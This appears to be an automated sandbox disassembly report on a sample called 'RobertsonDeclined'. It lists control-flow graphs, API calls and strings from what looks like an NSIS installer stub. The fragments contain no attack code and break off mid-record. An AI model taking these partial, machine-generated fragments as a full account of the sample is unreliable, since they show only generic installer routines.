                                                                                                    control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNEL32(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                    • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                    • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                    • API String ID: 608394941-1650083594
                                                                                                    • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                    • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,ReplicationWorry,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,ReplicationWorry,ReplicationWorry,00000000,00000000,ReplicationWorry,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$ReplicationWorry
                                                                                                    • API String ID: 4286501637-419934467
                                                                                                    • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                    • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 633 403733-403739 609->633 610->607 638 40376b-40377c 610->638 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 618 4036c7-4036cb 613->618 619 40364d-403661 call 405e0c 613->619 614->607 622 4036d5-4036db 618->622 623 4036cd-4036d4 call 4032d2 618->623 619->622 636 403663-40366a 619->636 629 4036ea-4036f4 622->629 630 4036dd-4036e7 call 407281 622->630 623->622 629->602 637 4036fa 629->637 630->629 633->607 633->610 636->622 640 40366c-403673 636->640 637->600 641 403784-403787 638->641 642 40377e 638->642 640->622 644 403675-40367c 640->644 643 40378a-403792 641->643 642->641 643->643 645 403794-4037af SetFilePointer call 405e0c 643->645 644->622 646 40367e-403685 644->646 650 4037b4 645->650 646->622 647 403687-4036a7 646->647 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->637 651->652 652->622 653 4036c3-4036c5 652->653 653->622
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNEL32(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                      • Part of subcall function 00405E50: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                    Strings
                                                                                                    • Inst, xrefs: 0040366C
                                                                                                    • soft, xrefs: 00403675
                                                                                                    • Error launching installer, xrefs: 004035D7
                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                    • Null, xrefs: 0040367E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                    • API String ID: 4283519449-527102705
                                                                                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                    • wsprintfW.USER32 ref: 004034A4
                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                    • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                    • API String ID: 651206458-1535804072
                                                                                                    • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                    • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                    • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2740478559-0
                                                                                                    • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                    • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 748 4030e3-4030f2 734->748 749 402387-40238d GlobalFree 734->749 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 752 401ee4-402702 call 406805 736->752 737->733 741 401ed1-401ed3 737->741 739->749 740->739 741->736 745 401ef7-402e50 call 406009 * 3 741->745 745->748 749->748 764 402708-40270e 752->764 764->748
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • GlobalFree.KERNEL32(00710060), ref: 00402387
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$ReplicationWorry
                                                                                                    • API String ID: 1459762280-4287379284
                                                                                                    • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                    • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 776 402369-402381 call 405f51 * 2 773->776 774->769 776->774
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                    • GlobalFree.KERNEL32(00710060), ref: 00402387
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 3376005127-0
                                                                                                    • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                    • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2568930968-0
                                                                                                    • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                    • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
